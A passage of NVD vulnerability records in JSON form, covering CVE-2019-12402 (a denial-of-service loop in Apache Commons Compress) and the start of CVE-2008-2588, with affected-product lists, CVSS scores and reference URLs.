"af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3Cgithub.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3Cgithub.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3Cgithub.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3Ccommits.logging.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3Cgithub.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3Ccommits.doris.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3Cgithub.beam.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third 
Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: 
"CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:commons_compress:*:*:*:*:*:*:*:*", matchCriteriaId: "915E4B88-B2DA-40C0-AD95-9888FD42EEAF", versionEndIncluding: "1.18", versionStartIncluding: "1.15", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", matchCriteriaId: "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", matchCriteriaId: "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:banking_payments:*:*:*:*:*:*:*:*", matchCriteriaId: "2FF46C9A-7768-4E52-A676-BEA6AE766AD4", versionEndIncluding: "14.4.0", versionStartIncluding: "14.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.7.0:*:*:*:*:*:*:*", matchCriteriaId: "282150FF-C945-4A3E-8A80-E8757A8907EA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.8.0:*:*:*:*:*:*:*", matchCriteriaId: "FBCE22C0-4253-40A5-89AE-499A3BC9EFF3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.9.0:*:*:*:*:*:*:*", matchCriteriaId: "AB9FC9AB-1070-420F-870E-A5EC43A924A4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", versionEndIncluding: "8.2.2", versionStartIncluding: "8.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_ip_service_activator:7.3.0:*:*:*:*:*:*:*", matchCriteriaId: "DE48E0FE-5931-441C-B4FF-253BD9C48186", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_ip_service_activator:7.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DE7A60DB-A287-4E61-8131-B6314007191B", 
vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "3E5416A1-EE58-415D-9645-B6A875EBAED2", versionEndIncluding: "8.2.2", versionStartIncluding: "8.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", versionEndIncluding: "8.2.2", versionStartIncluding: "8.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*", matchCriteriaId: "727DF4F5-3D21-491E-96B9-EC973A6C9C18", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:essbase:21.2:*:*:*:*:*:*:*", matchCriteriaId: "394A16F2-CCD4-44E5-BF6B-E0C782A9FA38", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "21BE77B2-6368-470E-B9E6-21664D9A818A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.3.0:*:*:*:*:*:*:*", matchCriteriaId: "3250073F-325A-4AFC-892F-F2005E3854A5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.4.0:*:*:*:*:*:*:*", matchCriteriaId: "0DDDC9C2-33D6-4123-9ABC-C9B809A6E88E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:14.0.0:*:*:*:*:*:*:*", matchCriteriaId: "991A279B-9D7C-4E39-8827-BC21C2C03B83", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:14.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A69266D2-72D0-4A6C-883D-2597FE30931B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6762F207-93C7-4363-B2F9-7A7C6F8AF993", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "1B74B912-152D-4F38-9FC1-741D6D0B27FC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:11.1.2.4:*:*:*:*:*:*:*", matchCriteriaId: 
"DED59B62-C9BF-4C0E-B351-3884E8441655", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.56:*:*:*:*:*:*:*", matchCriteriaId: "CEB3BE9F-44AC-4EE0-9E66-2B72CF4AF0F5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "99BA317E-3C52-4BAF-B61C-803B7208C155", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "929638B0-AAD1-4326-9549-2FA8D03AA7ED", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "597495A7-FE17-4B31-804D-B28C2B872B4D", versionEndIncluding: "18.8.8", versionStartIncluding: "18.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:19.12.0:*:*:*:*:*:*:*", matchCriteriaId: "B201A85E-1310-46B8-8A3B-FF7675F84E09", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", matchCriteriaId: "42064F46-3012-4FB1-89BA-F13C2E4CBB6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", matchCriteriaId: "F73E2EFA-0F43-4D92-8C7D-9E66811B76D6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*", matchCriteriaId: "11DA6839-849D-4CEF-85F3-38FE75E07183", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*", matchCriteriaId: "BCE78490-A4BE-40BD-8C72-0A4526BBD4A4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", matchCriteriaId: "55AE3629-4A66-49E4-A33D-6D81CC94962F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*", matchCriteriaId: "4CB39A1A-AD29-45DD-9EB5-5E2053A01B9A", vulnerable: 
true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*", matchCriteriaId: "27C26705-6D1F-4D5E-B64D-B479108154FF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "5A502118-5B2B-47AE-82EC-1999BD841103", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.", }, { lang: "es", value: "El algoritmo de codificación de nombre de archivo utilizado internamente en Apache Commons Compress versiones 1.15 hasta 1.18, puede entrar en un bucle infinito cuando se enfrenta a entradas especialmente diseñadas. 
Esto puede conllevar a un ataque de denegación de servicio si un atacante puede elegir los nombres de archivo dentro de un registro creado por Compress.", }, ], id: "CVE-2019-12402", lastModified: "2024-11-21T04:22:45.983", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-08-30T09:15:17.910", references: [ { source: "security@apache.org", url: "https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b%40%3Cdev.commons.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea%40%3Ccommits.creadur.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: 
"https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53%40%3Cdev.brooklyn.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: 
"https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265%40%3Cissues.flink.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7/", }, { source: "security@apache.org", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL/", }, { source: "security@apache.org", url: "https://security.netapp.com/advisory/ntap-20230818-0001/", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: 
"https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "security@apache.org", tags: [ "Not Applicable", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b%40%3Cdev.commons.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea%40%3Ccommits.creadur.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53%40%3Cdev.brooklyn.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.netapp.com/advisory/ntap-20230818-0001/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Not Applicable", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-835", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
oracle | jdeveloper | 10.1.2.2 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:10.1.2.2:*:*:*:*:*:*:*", matchCriteriaId: "8EE422EB-0F67-48D1-AAB0-9C43D452F5B8", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 allows local users to affect confidentiality via unknown vectors.", }, { lang: "es", value: "Vulnerabilidad no especificada en el componente Oracle JDeveloper en Oracle Application Server v10.1.2.2 permite a usuarios locales afectar a la confidencialidad a través de vectores desconocidos.", }, ], id: "CVE-2008-2588", lastModified: "2025-04-09T00:30:58.490", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "NONE", baseScore: 2.1, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N", version: "2.0", }, 